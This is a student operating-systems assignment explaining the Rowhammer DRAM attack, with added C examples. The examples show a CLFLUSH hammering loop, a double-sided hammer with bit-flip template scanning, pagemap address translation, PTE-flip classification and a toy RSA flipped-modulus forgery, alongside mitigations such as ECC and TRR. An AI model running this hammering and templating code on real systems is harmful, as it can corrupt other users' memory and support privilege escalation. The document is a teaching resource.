Rowhammer Attack

The Rowhammer attack is a hardware vulnerability in DRAM that allows unprivileged users to corrupt memory, escalate privileges, and steal sensitive data. It exploits the physical structure of memory cells, causing bit flips in adjacent rows through repeated access, which can compromise operating system security and bypass virtual memory protections. Mitigation techniques include using ECC memory, increasing refresh rates, and implementing software patches, but complete prevention remains challenging.

Uploaded by: fatimaraja1258

Submitted by: Noor Fatima

Submitted to: Mam Zakia Jaleel


Reg No. 4678-FOC/BSCS/F22
Course: Operating System

Assignment # 1
Rowhammer Attack

Rowhammer Attack: A Deep Dive

1. Introduction
The Rowhammer attack is a hardware-based security vulnerability that affects DRAM (Dynamic
Random Access Memory). It was first characterised in detail in 2014 (Kim et al., ISCA 2014), and the
first practical exploits were published by Google Project Zero in 2015. It exploits the way modern
memory cells are physically structured: cells are packed so densely that repeatedly activating one
row disturbs the charge held in its neighbours.

Why is it dangerous?

o It allows unprivileged users to corrupt memory.

o It can be used to escalate privileges, bypass security mechanisms, and steal sensitive data from
other processes.

o It is a hardware-level attack, making it difficult to patch via software updates.

2. How Rowhammer Works


2.1 DRAM Basics

DRAM stores data in capacitors, which hold electrical charges. Each capacitor represents a bit (0 or 1).
These capacitors are arranged in rows; each cell has an access transistor, and all transistors of a row
are switched on together by that row's wordline.

o A memory row is activated (opened) when the CPU accesses data in it and the access is not served
by the cache; the row's contents are read into the row buffer and written back.

o Repeatedly activating a row (hammering) disturbs the charge in the cells of physically adjacent
rows. DRAM refreshes each row only once per 64 ms, so a cell that leaks enough charge between two
refreshes flips its value.

2.2 Rowhammer Effect: Bit Flipping

o If a row is accessed too frequently, it can cause bit flips in neighboring rows.

o This means a 0 might change to 1, or vice versa, in adjacent rows.

o These bit flips can alter program data, security settings, or even OS kernel data.

Structure of DRAM:

A row consists of cells, and each cell consists of a capacitor and an access transistor. The capacitor
stores a tiny amount of charge, which represents the value in the cell and must be refreshed
periodically because it leaks.

Hammering a DRAM row with flush and reload (CLFLUSH, then re-read, so every access reaches the chip):

When you activate a row very often, bits might flip in the neighbouring row. In the example below,
rows A and C are the aggressor rows and row B is the victim.

Before:

Row A: 1101010110

Row B: 0010101011 <-- Target Row (bit flips occur here)

Row C: 1101010110

After Rowhammer:

Row A: 1101010110

Row B: 0010111011 <-- Bit flip occurred!

Row C: 1101010110

3. How Rowhammer Attacks an OS (Memory Exploitation)


Rowhammer exploits work by modifying critical memory areas. Here’s how attackers use it against the
OS:

3.1 Step-by-Step Memory Attack

1. Identifying Vulnerable Memory Rows

o The attacker finds memory it owns whose pages sit in adjacent DRAM rows, hammers them, and
records which bits flip reliably and in which direction.

o This requires knowing physical addresses. Project Zero's 2015 exploit read them from
/proc/self/pagemap on Linux; since Linux 4.0 the frame numbers in that file are hidden from
unprivileged processes, so later exploits infer physical adjacency from access timing instead.

2. Triggering Bit Flips

o The attacker hammers the selected rows hundreds of thousands of times within one DRAM refresh
interval (64 ms), flushing the cache before each access so that every access really reaches DRAM.

o This process flips bits in the adjacent row without ever accessing it.

3. Modifying Page Table Entries (PTEs)

o The OS stores page table entries (PTEs) in ordinary DRAM. Each PTE holds the physical frame
number of a page together with its permission bits (present, read/write, user/supervisor,
no-execute).

o A bit flip in a PTE can:

 Change a read-only mapping to writable (a flip of the R/W bit).

 Change the frame number so that the page now maps a different physical page. Project Zero's
exploit filled memory with page tables so that a flipped frame number was likely to point at one
of them; a writable mapping of your own page table lets you rewrite any mapping you like, which
amounts to read/write access to all physical memory.

4. Escalating Privileges

o Attackers can modify kernel-level structures, giving themselves root/admin privileges.

5. Accessing Other Processes' Memory

o Once privileges are elevated, attackers can read and modify other processes' memory.

o This allows them to steal passwords, encryption keys, or inject malicious code.
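To make step 3 concrete, here is an added example (written for this page, not part of the original assignment and not Project Zero's exploit code) that models an x86-64 page-table entry and classifies what a single-bit flip at each position would do to it. The frame number 0x12345 and the list of "sprayed" page-table frames are constructed values; the bit layout of the PTE is the real x86-64 one.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* x86-64 4 KiB page-table entry fields used here. */
#define PTE_PRESENT  (1ULL << 0)              /* mapping is valid */
#define PTE_RW       (1ULL << 1)              /* 1 = writable, 0 = read-only */
#define PTE_USER     (1ULL << 2)              /* 1 = user mode may access */
#define PTE_NX       (1ULL << 63)             /* 1 = no-execute */
#define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL    /* bits 12..51: physical frame number */

enum flip_effect {
    FLIP_UNMAPS,           /* present bit cleared: the next access faults */
    FLIP_RO_TO_RW,         /* read-only mapping became writable */
    FLIP_RW_TO_RO,         /* writable mapping became read-only */
    FLIP_CLEARS_NX,        /* data page became executable */
    FLIP_RETARGETS_FRAME,  /* frame number changed: page now maps other memory */
    FLIP_HITS_PAGE_TABLE,  /* ...and that other memory is one of the sprayed page tables */
    FLIP_OTHER             /* some other field (U/S, caching, A/D, OS-available bits) */
};

uint64_t pte_make(uint64_t pfn, bool rw, bool user, bool nx) {
    uint64_t pte = PTE_PRESENT | ((pfn << 12) & PTE_PFN_MASK);
    if (rw)   pte |= PTE_RW;
    if (user) pte |= PTE_USER;
    if (nx)   pte |= PTE_NX;
    return pte;
}

uint64_t pte_pfn(uint64_t pte) { return (pte & PTE_PFN_MASK) >> 12; }

/* Hypothetical (constructed) set of physical frames the attacker filled with
 * its own page tables by mapping a large sparse range ("page-table spraying"). */
#define N_SPRAYED 3
static const uint64_t SPRAYED_PT_FRAMES[N_SPRAYED] = { 0x12344, 0x12347, 0x12341 };

/* What a single Rowhammer-induced flip at position `bit` does to a present PTE. */
enum flip_effect classify_pte_flip(uint64_t pte, int bit,
                                   const uint64_t *pt_frames, size_t n_pt)
{
    uint64_t flipped = pte ^ (1ULL << bit);

    if (!(flipped & PTE_PRESENT))
        return FLIP_UNMAPS;
    if (bit == 1)
        return (flipped & PTE_RW) ? FLIP_RO_TO_RW : FLIP_RW_TO_RO;
    if (bit == 63)
        return (flipped & PTE_NX) ? FLIP_OTHER : FLIP_CLEARS_NX;
    if ((1ULL << bit) & PTE_PFN_MASK) {
        uint64_t new_pfn = pte_pfn(flipped);
        for (size_t i = 0; i < n_pt; i++)
            if (pt_frames[i] == new_pfn)
                return FLIP_HITS_PAGE_TABLE;
        return FLIP_RETARGETS_FRAME;
    }
    return FLIP_OTHER;
}

/* How many of the 40 frame-number bits, if flipped, would point this PTE at a
 * sprayed page table. The attacker wants this high, which is why exploits
 * spray page tables across as much physical memory as they can get. */
int count_pt_hits(uint64_t pte, const uint64_t *pt_frames, size_t n_pt) {
    int hits = 0;
    for (int bit = 12; bit <= 51; bit++)
        if (classify_pte_flip(pte, bit, pt_frames, n_pt) == FLIP_HITS_PAGE_TABLE)
            hits++;
    return hits;
}

int main(void) {
    uint64_t pte = pte_make(0x12345, true, true, true);   /* attacker's own RW data page */
    static const char *names[] = { "unmaps", "ro->rw", "rw->ro", "clears NX",
                                   "retargets frame", "hits page table", "other" };
    for (int bit = 0; bit < 64; bit++) {
        enum flip_effect e = classify_pte_flip(pte, bit, SPRAYED_PT_FRAMES, N_SPRAYED);
        if (e != FLIP_OTHER && e != FLIP_RETARGETS_FRAME)
            printf("bit %2d: %s\n", bit, names[e]);
    }
    printf("%d frame-number flips land on a sprayed page table\n",
           count_pt_hits(pte, SPRAYED_PT_FRAMES, N_SPRAYED));
    return 0;
}
```

The interesting outcome for an attacker is FLIP_HITS_PAGE_TABLE on a PTE of a page it already owns with write access: the page keeps its permissions but now aliases a page table, so ordinary stores rewrite mappings. A flip of the R/W bit is only useful if the page was mapped read-only to something worth writing, and a cleared present bit just crashes the process.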

4. How Rowhammer Penetrates Other Processes’ Information


Rowhammer is particularly dangerous because it bypasses traditional virtual memory protections and
affects other processes running on the same system. This makes it a serious security risk for multi-user
environments, virtual machines, and cloud computing.

1. Understanding Virtual Memory vs. Physical Memory

Feature          | Virtual Memory                                       | Physical Memory (RAM)
What is it?      | A memory management system that isolates processes.  | The actual RAM chips storing data.
Who controls it? | The OS and the CPU's memory management unit (MMU).   | The hardware (DRAM chips).
Is it shared?    | No, each process has its own virtual memory space.   | Yes, pages of many processes live in the same physical memory.

How Virtual Memory Normally Prevents Attacks

 Each process runs in its own isolated memory space.

 A process cannot directly access another process’s memory.

 The operating system (OS) maps virtual memory to physical memory.

 Security mechanisms like Address Space Layout Randomization (ASLR) make it harder for
attackers to predict memory locations.

 Key Weakness: Rowhammer does not attack virtual memory; instead, it attacks physical
memory directly. Since virtual memory is mapped to physical memory, bit flips in physical
memory can affect multiple virtual memory spaces.

Additionally, modern CPUs include hardware-isolated execution environments like Intel SGX and ARM
TrustZone. Rowhammer has been aimed at these as well; in SGX's case the memory encryption engine's
integrity check catches the flipped bit and locks the machine, so the result is denial of service
rather than silent corruption.
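The virtual-to-physical mapping is exactly what an attacker needs in order to know which rows are adjacent. As an added example (not from the original document), the following C program reads the translation for one of its own pages from /proc/self/pagemap on Linux and decodes the entry according to the kernel's documented layout. On kernels since 4.0 an unprivileged run reports that the frame number is hidden, which is one of the software mitigations.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

/* One /proc/PID/pagemap entry per virtual page (Linux pagemap documentation):
 *   bit 63      page is present in RAM
 *   bit 62      page is swapped out
 *   bit 61      file-backed page or shared anonymous page
 *   bits 0..54  page frame number (PFN) if present
 * Since Linux 4.0 the PFN field reads as zero unless the caller has
 * CAP_SYS_ADMIN, precisely to take this translation step away from
 * unprivileged Rowhammer exploits. */
struct pagemap_info {
    bool present;
    bool swapped;
    bool shared;
    uint64_t pfn;
};

struct pagemap_info pagemap_decode(uint64_t entry) {
    struct pagemap_info info;
    info.present = (entry >> 63) & 1;
    info.swapped = (entry >> 62) & 1;
    info.shared  = (entry >> 61) & 1;
    info.pfn     = entry & ((1ULL << 55) - 1);
    return info;
}

/* Translate a virtual address of this process to a physical address.
 * Returns 0 when the page is not resident or the kernel hides the PFN. */
uint64_t virt_to_phys(const void *vaddr) {
    uintptr_t va = (uintptr_t)vaddr;
    uint64_t page_size = (uint64_t)sysconf(_SC_PAGESIZE);
    uint64_t entry = 0;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0)
        return 0;
    off_t offset = (off_t)((va / page_size) * sizeof entry);
    ssize_t got = -1;
    if (lseek(fd, offset, SEEK_SET) == offset)
        got = read(fd, &entry, sizeof entry);
    close(fd);
    if (got != (ssize_t)sizeof entry)
        return 0;

    struct pagemap_info info = pagemap_decode(entry);
    if (!info.present || info.pfn == 0)
        return 0;                                   /* not resident, or PFN hidden */
    return info.pfn * page_size + (va % page_size);
}

int main(void) {
    static char buf[8192];
    buf[0] = 1;   /* write to the page so it is backed by a real frame, not the shared zero page */
    uint64_t pa = virt_to_phys(buf);
    if (pa == 0)
        printf("PFN hidden or page not resident (expected for an unprivileged process on Linux >= 4.0)\n");
    else
        printf("virt %p -> phys 0x%llx\n", (void *)buf, (unsigned long long)pa);
    return 0;
}
```

Run it once as a normal user and once as root to see the difference. Note that the write to buf[0] matters: reading an untouched anonymous page returns zeros from a single shared zero page, so two such "different" addresses would translate to the same frame.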

2. How Rowhammer Bypasses Virtual Memory Protections

Since Rowhammer operates at the hardware level, it can break process isolation in several ways:

 Direct Memory Corruption Across Processes

Even though processes are separated in virtual memory, their pages all live in the same physical
DRAM, and the OS decides which physical page each process gets. If the attacker's page and a
victim's page land in physically adjacent rows, hammering the attacker's own page can flip bits in
the victim's page. The attacker can then:

1. Corrupt another process's memory (causing crashes or injecting malicious data).

2. Alter OS kernel data (escalating privileges).

3. Modify encryption keys stored in memory.

Example:

 Process A (the attacker) owns a page in DRAM row X.

 Process B (the victim) owns a page in DRAM row X+1, directly adjacent. Process A cannot read or
write that page; the MMU would fault.

 If Process A hammers row X (and, double-sided, row X+2 as well), it can cause bit flips in row
X+1, changing Process B's data without ever accessing it. No permission check runs, because no
instruction ever touched the victim's address.

Attackers use cache flushing (e.g., the CLFLUSH instruction) between accesses so that each read is
served by DRAM rather than by the CPU cache; without it, repeated reads of the same address never
reach the memory chip and cause no row activations.

3. Attacks on Cloud & Virtual Machines (VMs)

 Multi-Tenant Cloud Systems

In cloud computing, multiple virtual machines (VMs) from different users run on the same physical
server. These VMs share the same DRAM, even though they have separate virtual memory.

 How Rowhammer Works in the Cloud:

1. A hacker rents a VM in a cloud provider (AWS, Google Cloud, etc.).

2. The attacker runs a Rowhammer attack inside their VM.

3. The attack flips bits in memory used by another victim's VM running on the same server.

4. This allows the hacker to modify or leak sensitive information from another customer’s VM!

Real-World Example:

 Razavi et al. (USENIX Security 2016) demonstrated Flip Feng Shui on a cloud-style setup where one
VM used bit flips in deduplicated memory to compromise another VM running on the same physical
server.

Cloud providers mitigate Rowhammer risks through ECC RAM, TRR (Target Row Refresh), and by not
deduplicating memory across tenants. ECC corrects a single flipped bit per word and only detects two,
so it raises the bar rather than removing the problem.

 Flip Feng Shui Attack (Targeting Shared Memory in the Cloud)

A special Rowhammer attack called Flip Feng Shui allows attackers to target specific bits in a victim's
memory in a cloud environment.

1. Memory Deduplication: Hypervisors can use deduplication (such as Linux KSM) to save space by
merging identical memory pages from different VMs into one physical page, which is then shared
copy-on-write.

2. Attacker Templates and Bait: The attacker first hammers its own memory to find a physical page
with a reliable, known bit flip (a "template"). It then writes a copy of the victim's page content
(for example the victim's public key) into that page; the deduplicator merges the victim's page
onto the attacker's physical page.

3. Bit Flip Corruption: The attacker hammers the neighbours of that page to trigger the known flip.
Copy-on-write only intercepts software writes, so the hardware flip lands in the single shared copy
and therefore in the victim's view of its own data (such as cryptographic keys).

Impact:

 Attackers can modify SSH public keys, package-signing keys, or other authentication data in a
victim's memory. In the original work, one flipped bit in the RSA modulus of a key in the victim's
authorized_keys file produced a modulus the attacker could factor, letting the attacker compute a
matching private key and log in.

 Public cloud providers generally do not enable memory deduplication across tenants, partly because
of this attack.

Unlike traditional Rowhammer, Flip Feng Shui gives attackers better control over which bits
flip, allowing precision attacks on security-critical data.

4. Extracting Sensitive Data with Rowhammer

 Attacking Cryptographic Keys

 Many security-sensitive applications keep cryptographic keys in RAM.

 A Rowhammer flip in a key does not leak the key by itself; it makes the victim compute with a key
that differs from the intended one at a known bit position, and cryptanalysis of the resulting
output can recover the original key.

Example: Attacking Encryption Keys

 AES (Advanced Encryption Standard) uses fixed-length keys (128-bit, 192-bit, 256-bit).

 Flipping a bit in an AES key does not weaken the cipher, but it is a fault injection: differential
fault analysis compares outputs computed under the correct and the faulted key (or state) to recover
the key, and Rowhammer supplies such faults without physical access to the machine.

 The same holds for RSA: a signature computed with a flipped private-key component can be enough to
recover private-key bits, and such fault attacks have been mounted with Rowhammer-induced flips.
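The Flip Feng Shui SSH-key attack described earlier and the key-weakening claim in this section come down to the same fact: a public modulus with one flipped bit is a different number, usually with small factors. The following added example (constructed for this page, not code from the Flip Feng Shui authors) shows it on a toy 12-bit RSA key with p = 61, q = 53 and e = 17, all chosen here; it flips one bit of n, factors the result by trial division, derives a private exponent for the flipped modulus, and checks that a victim holding the flipped modulus accepts the forged signature. It also shows that some flips are unusable because e has no inverse modulo phi(n'), which the real attack has to cope with too.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Toy key constructed for this example (a real key has a 2048-bit modulus). */
#define TOY_P 61ULL
#define TOY_Q 53ULL
#define TOY_N (TOY_P * TOY_Q)     /* 3233 */
#define TOY_E 17ULL

/* All values here are far below 2^32, so 64-bit products never overflow. */
static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t m) { return (a * b) % m; }

static uint64_t powmod(uint64_t base, uint64_t exp, uint64_t m) {
    uint64_t r = 1;
    base %= m;
    while (exp) {
        if (exp & 1) r = mulmod(r, base, m);
        base = mulmod(base, base, m);
        exp >>= 1;
    }
    return r;
}

/* Modular inverse of a mod m by the extended Euclidean algorithm; 0 if none. */
static uint64_t invmod(uint64_t a, uint64_t m) {
    int64_t t = 0, new_t = 1;
    int64_t r = (int64_t)m, new_r = (int64_t)(a % m);
    while (new_r != 0) {
        int64_t q = r / new_r, tmp;
        tmp = t - q * new_t; t = new_t; new_t = tmp;
        tmp = r - q * new_r; r = new_r; new_r = tmp;
    }
    if (r != 1) return 0;
    return (uint64_t)(t < 0 ? t + (int64_t)m : t);
}

/* Euler's totient from a trial-division factorisation. Factoring a 2048-bit
 * flipped modulus is not this easy, but it is usually far easier than
 * factoring the original, because n' is no longer a product of two
 * equally sized primes. */
static uint64_t totient(uint64_t n) {
    uint64_t result = n;
    for (uint64_t p = 2; p * p <= n; p++) {
        if (n % p) continue;
        while (n % p == 0) n /= p;
        result -= result / p;
    }
    if (n > 1) result -= result / n;
    return result;
}

/* What the Rowhammer flip does to the victim's copy of the public key. */
uint64_t flip_modulus(uint64_t n, int bit) { return n ^ (1ULL << bit); }

/* Private exponent matching the corrupted modulus n' = n ^ (1 << bit),
 * or 0 if e has no inverse mod phi(n') and this particular flip is unusable. */
uint64_t forged_exponent(uint64_t n, uint64_t e, int bit) {
    return invmod(e, totient(flip_modulus(n, bit)));
}

/* End to end: the attacker signs m with the forged key; the victim verifies
 * with the public exponent e and the modulus it now holds in memory (n'). */
bool forged_signature_accepted(uint64_t n, uint64_t e, int bit, uint64_t m) {
    uint64_t n_flipped = flip_modulus(n, bit);
    uint64_t d = forged_exponent(n, e, bit);
    if (d == 0) return false;
    uint64_t sig = powmod(m, d, n_flipped);
    return powmod(sig, e, n_flipped) == m % n_flipped;
}

int main(void) {
    for (int bit = 0; bit < 12; bit++) {
        uint64_t d = forged_exponent(TOY_N, TOY_E, bit);
        printf("flip bit %2d: n' = %4llu  %s\n", bit,
               (unsigned long long)flip_modulus(TOY_N, bit),
               d ? "usable, forged d' found" : "unusable (gcd(e, phi(n')) != 1)");
    }
    return 0;
}
```

Flipping bit 2 gives n' = 3237 = 3 * 13 * 83, for which d' = 1505 satisfies e * d' = 1 mod phi(n'); flipping bit 1 gives n' = 3235 = 5 * 647, and 17 divides phi(n') = 2584, so no private exponent exists. The real attack enumerates the flips its templates can produce and picks one whose n' both factors and yields an invertible e.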


 Stealing Login Credentials

 A bit flip writes, it does not read, so Rowhammer alone cannot extract a password hash. What it can
do is change the check: flipping a bit in a stored hash, in the comparison logic, or in an opcode of
a setuid binary such as sudo can make an attacker-chosen password, or any password, pass.

 Later work (RAMBleed, 2020) showed that the probability of a flip depends on the values stored in
neighbouring rows, which turns Rowhammer into a read side channel for secrets such as RSA keys; that
is how data is actually leaked rather than corrupted.

 Modifying Authentication Mechanisms

 Many authentication systems store user permissions and roles in memory.

 If an attacker flips a bit in the user's permission level, they could escalate privileges (e.g., a
normal user becomes an admin).

5. Real-World Rowhammer Attack Variants
1. Double-Sided Rowhammer

o The attacker hammers the two rows on either side of a victim row.

o Most effective in causing bit flips, because the victim row is disturbed from both sides.

2. Single-Sided Rowhammer

o Hammers one aggressor row next to the victim (alternating with a far-away row so the row buffer
keeps being reopened); less effective, but needs less knowledge of the physical layout.

3. Rowhammer.js (JavaScript Attack)

o Uses JavaScript in a web browser to induce Rowhammer effects, so no native code or installation
is needed.

o JavaScript cannot execute CLFLUSH, so it evicts the target cache lines with carefully chosen
memory access patterns instead.

4. Flip Feng Shui

o Targets memory deduplication in cloud environments.

o Allows an attacker to manipulate another user's data in a shared memory environment.

6. Rowhammer Code Example (C Language)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <x86intrin.h> // For _mm_clflush (x86 only)

#define NUM_ACCESSES 1000000

// Alternately read two addresses, flushing each from the cache first so that
// every read is served by DRAM and therefore activates its row.
void hammer_memory(char *addr1, char *addr2) {
    for (int i = 0; i < NUM_ACCESSES; i++) {
        _mm_clflush(addr1); // Flush the cache line holding addr1
        _mm_clflush(addr2);
        (void)*(volatile char *)addr1; // Access memory (row activation)
        (void)*(volatile char *)addr2;
    }
}

int main(void) {
    size_t mem_size = 1024 * 1024 * 64; // Allocate 64MB
    char *memory = malloc(mem_size);
    if (!memory) {
        printf("Memory allocation failed!\n");
        return -1;
    }
    // Write to the buffer so every page is backed by its own DRAM frame;
    // untouched pages would all map to the kernel's shared zero page.
    memset(memory, 0xFF, mem_size);

    char *addr1 = &memory[4096]; // Row A (assumed; see the note below)
    char *addr2 = &memory[8192]; // Row C (assumed)

    hammer_memory(addr1, addr2);
    printf("Rowhammer executed!\n");

    free(memory);
    return 0;
}

What this code does:

 Allocates 64MB of memory and writes to it so the pages are physically backed.

 Repeatedly accesses two addresses 4 KB apart, flushing the cache each time so the accesses reach
DRAM.

 Whether these two addresses really lie in rows A and C around a victim row B depends on the
physical pages the OS assigned and on the memory controller's address mapping, which virtual offsets
do not reveal; a real exploit determines physical addresses and the row layout first and then scans
the victim page for flipped bits. As written, the snippet demonstrates only the hammering loop.
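The snippet above never checks whether anything flipped. As an added example (not part of the assignment's code), here is a double-sided version with the missing half: fill the victim row with a known pattern, hammer both neighbours, flush the victim out of the cache and scan it for changed bits. The 8 KB row size, the round count and the sample row used for the self-check are assumptions; the three "rows" are consecutive virtual regions, so on a real system you would first confirm their physical adjacency (via pagemap or huge pages), and on healthy DRAM the run reports no flips.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define FLUSH_LINE(p) _mm_clflush((const void *)(p))
#else
/* No clflush on this architecture: the loop still runs but mostly hits the
 * cache, so no row activations happen and no flips should be expected. */
#define FLUSH_LINE(p) ((void)(p))
#endif

#define ROW_BYTES     8192      /* assumed DRAM row size; the real value is chip-specific */
#define HAMMER_ROUNDS 500000    /* assumed: enough activations to span a 64 ms refresh interval */
#define LINE_BYTES    64

struct flip {
    size_t offset;   /* byte offset inside the victim row */
    int bit;         /* 0..7 */
    int direction;   /* 1 = flipped 0->1, 0 = flipped 1->0 */
};

/* Double-sided hammer: activate the rows above and below the victim in
 * alternation, flushing after each read so the next read reaches DRAM. */
void hammer_double_sided(const volatile uint8_t *above, const volatile uint8_t *below, long rounds) {
    for (long i = 0; i < rounds; i++) {
        (void)*above;
        (void)*below;
        FLUSH_LINE(above);
        FLUSH_LINE(below);
    }
}

/* Compare a row against the pattern it was filled with and record each flipped bit.
 * Returns the total number of flips; at most max_out are written to `out`. */
size_t scan_flips(const uint8_t *row, size_t len, uint8_t expected,
                  struct flip *out, size_t max_out) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = row[i] ^ expected;
        for (int b = 0; b < 8 && diff; b++) {
            if (!(diff & (1u << b))) continue;
            if (out && n < max_out) {
                out[n].offset = i;
                out[n].bit = b;
                out[n].direction = (row[i] >> b) & 1;
            }
            n++;
        }
    }
    return n;
}

/* k-th flip in a row (offset SIZE_MAX if there is none). */
struct flip nth_flip(const uint8_t *row, size_t len, uint8_t expected, size_t k) {
    struct flip f = { SIZE_MAX, -1, -1 };
    struct flip found[64];
    size_t n = scan_flips(row, len, expected, found, 64);
    if (k < n && k < 64) f = found[k];
    return f;
}

/* Constructed sample row for the self-check: filled with 0xFF, with two 1->0 flips. */
static const uint8_t SAMPLE_ROW[4] = { 0xFF, 0xDF, 0xFF, 0xFE };

int main(void) {
    size_t size = 3 * ROW_BYTES;
    uint8_t *buf = aligned_alloc(4096, size);
    if (!buf) { perror("aligned_alloc"); return 1; }
    memset(buf, 0xFF, size);                 /* victim row all ones: any flip reads as 1->0 */
    uint8_t *above = buf, *victim = buf + ROW_BYTES, *below = buf + 2 * ROW_BYTES;

    hammer_double_sided(above, below, HAMMER_ROUNDS);

    for (size_t i = 0; i < ROW_BYTES; i += LINE_BYTES)   /* read the victim from DRAM, not cache */
        FLUSH_LINE(victim + i);
    struct flip flips[16];
    size_t n = scan_flips(victim, ROW_BYTES, 0xFF, flips, 16);
    printf("%zu bit flip(s) in the victim row\n", n);
    for (size_t i = 0; i < n && i < 16; i++)
        printf("  offset %zu bit %d (%s)\n", flips[i].offset, flips[i].bit,
               flips[i].direction ? "0->1" : "1->0");
    free(buf);
    return 0;
}
```

A real tester runs this with both fill patterns (all ones and all zeros), because some cells only flip in one direction, and records each reproducible (offset, bit, direction) triple; those are the "templates" that Flip Feng Shui later matches against victim data.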

7. Prevention & Mitigation Techniques

Since Rowhammer is a hardware vulnerability, complete mitigation is difficult. However, defenses
include:

1. Error-Correcting Code (ECC) Memory

o ECC RAM corrects a single flipped bit per word and detects two; it does not stop three or more
flips within one word, which attackers have since produced deliberately.

2. Increasing DRAM Refresh Rate

o More frequent refresh cycles give a disturbed cell less time to leak charge before it is recharged,
reducing the chances of bit flips (at a cost in power and memory bandwidth).

3. Software-Based Mitigations

o Kernel changes that keep user pages and kernel data in separate physical memory regions, so that
user-controlled rows are never adjacent to kernel structures.

o Hiding physical addresses from unprivileged code (restricting /proc/self/pagemap, done in
Linux 4.0).

o Detection using CPU performance counters: an unusually high cache-miss rate to a small set of
addresses is the signature of hammering, and the suspected victim rows can be refreshed early.

4. Rowhammer Mitigation in Newer Hardware

o Some modern DRAM chips include Target Row Refresh (TRR), which tracks frequently activated rows
and refreshes their neighbours. Later research (TRRespass, 2020) showed that many-sided hammering
patterns evade the TRR implementations in many DDR4 chips, so TRR is an improvement rather than a
complete fix.
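To show what ECC can and cannot do, the following added example (written for this page, not from the document) implements a small SEC-DED code, Hamming(7,4) plus an overall parity bit, on 4-bit words and decodes a codeword with one, two and three flipped bits. Real ECC DIMMs use larger codes over 64-bit words, but the behaviour is the same: one flip is corrected, two are detected, three are silently miscorrected.

```c
#include <stdint.h>
#include <stdio.h>

/* SEC-DED code built from Hamming(7,4) plus an overall parity bit: the same
 * principle (at larger word sizes) that ECC DIMMs use. One flipped bit per
 * word is corrected, two are detected, three or more can slip through. */
enum ecc_status { ECC_OK, ECC_CORRECTED, ECC_UNCORRECTABLE };

struct ecc_result {
    enum ecc_status status;
    uint8_t data;          /* decoded 4-bit value (wrong for 3+ flips) */
};

/* Codeword layout: bit 0 = overall parity, bits 1,2,4 = Hamming parity,
 * bits 3,5,6,7 = data bits d0..d3. */
uint8_t secded_encode(uint8_t nibble) {
    int c[8] = {0};
    c[3] = (nibble >> 0) & 1;
    c[5] = (nibble >> 1) & 1;
    c[6] = (nibble >> 2) & 1;
    c[7] = (nibble >> 3) & 1;
    c[1] = c[3] ^ c[5] ^ c[7];
    c[2] = c[3] ^ c[6] ^ c[7];
    c[4] = c[5] ^ c[6] ^ c[7];
    c[0] = c[1] ^ c[2] ^ c[3] ^ c[4] ^ c[5] ^ c[6] ^ c[7];
    uint8_t word = 0;
    for (int i = 0; i < 8; i++) word |= (uint8_t)(c[i] << i);
    return word;
}

struct ecc_result secded_decode(uint8_t word) {
    int c[8], parity = 0;
    for (int i = 0; i < 8; i++) { c[i] = (word >> i) & 1; parity ^= c[i]; }
    /* Syndrome = position of a single error among bits 1..7 (0 = none). */
    int syndrome = (c[1] ^ c[3] ^ c[5] ^ c[7])
                 | (c[2] ^ c[3] ^ c[6] ^ c[7]) << 1
                 | (c[4] ^ c[5] ^ c[6] ^ c[7]) << 2;
    struct ecc_result r;
    if (syndrome == 0 && parity == 0) {
        r.status = ECC_OK;
    } else if (parity == 1) {
        c[syndrome] ^= 1;               /* odd number of flips: assume one and correct it */
        r.status = ECC_CORRECTED;
    } else {
        r.status = ECC_UNCORRECTABLE;   /* even number of flips (2): detected, not corrected */
    }
    r.data = (uint8_t)(c[3] | c[5] << 1 | c[6] << 2 | c[7] << 3);
    return r;
}

int main(void) {
    uint8_t word = secded_encode(0xB);
    uint8_t masks[] = { 0x00, 0x20, 0x60, 0xE0 };   /* 0, 1, 2 and 3 flipped bits */
    static const char *names[] = { "ok", "corrected", "uncorrectable" };
    for (int i = 0; i < 4; i++) {
        struct ecc_result r = secded_decode(word ^ masks[i]);
        printf("flips=0x%02x -> %-13s data=0x%x%s\n", masks[i], names[r.status], r.data,
               r.data != 0xB && r.status == ECC_CORRECTED ? "  <-- silent miscorrection" : "");
    }
    return 0;
}
```

The third case is the one that matters for Rowhammer: three flips inside one ECC word look like a single correctable error with the wrong syndrome, the controller "corrects" a bit that was fine, and the machine keeps running on corrupted data with no error logged.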

References:

 Kim et al., "Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM
Disturbance Errors" (ISCA 2014):
https://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf

 Google Project Zero, "Exploiting the DRAM rowhammer bug to gain kernel privileges" (2015):
https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
